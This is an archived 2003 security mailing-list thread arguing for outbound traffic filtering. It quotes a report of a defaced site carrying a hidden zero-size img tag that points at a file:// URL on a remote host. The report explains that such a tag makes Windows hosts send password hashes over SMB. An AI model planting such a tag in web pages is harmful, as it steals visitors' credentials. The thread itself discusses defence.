RE: Importance of outbound traffic filtering

From: Jack Lyons (jack.lyons_at_martinagency.com)
Date: 07/22/03

  • Next message: Harlan Carvey: "Re: First time security issue."
    To: "'Stark, Vernon L.'" <Vern.Stark@jhuapl.edu>, "'incidents@securityfocus.com'" <incidents@securityfocus.com>
    Date: Tue, 22 Jul 2003 12:38:47 -0400
    
    

    I block those ports and others outbound, but it would only stop DDOS attack
    against people who left those ports open inbound - correct?

    > -----Original Message-----
    > From: Stark, Vernon L. [mailto:Vern.Stark@jhuapl.edu]
    > Sent: Friday, July 18, 2003 10:13 AM
    > To: 'incidents@securityfocus.com'
    > Subject: Importance of outbound traffic filtering
    >
    > For the third time since May 5th, a site which provides news about
    > department of defense issues has apparently been defaced. The hack is
    > described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
    > 289-290). The hack we noticed today is a web page with content of the
    > form
    >
    > <img src=file://korean_ip_address/test.jpg height=0 width=0>
    >
    > If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
    > hosts will attempt to send password hashes to the remote host. Hosts may
    > attempt to contact the remote host on other ports (e.g. 80) as well. This
    > clearly illustrates the importance of outbound traffic filtering.
    >
    > Vern Stark, GCIA, GSEC
    >
    > JHU/APL
    >
    > --------------------------------------------------------------------------
    > --
    > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > world's premier technical IT security event! 10 tracks, 15 training
    > sessions,
    > 1,800 delegates from 30 nations including all of the top experts, from
    > CSO's to
    > "underground" security specialists. See for yourself what the buzz is
    > about!
    > Early-bird registration ends July 3. This event will sell out.
    > www.blackhat.com
    > --------------------------------------------------------------------------
    > --

    This email and its contents may be confidential. If it is and you are not
    the intended recipient, please do not disclose or use the information within
    this email or its attachments. If you have received this email in error,
    please delete it immediately. Thank you.

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------


  • Next message: Harlan Carvey: "Re: First time security issue."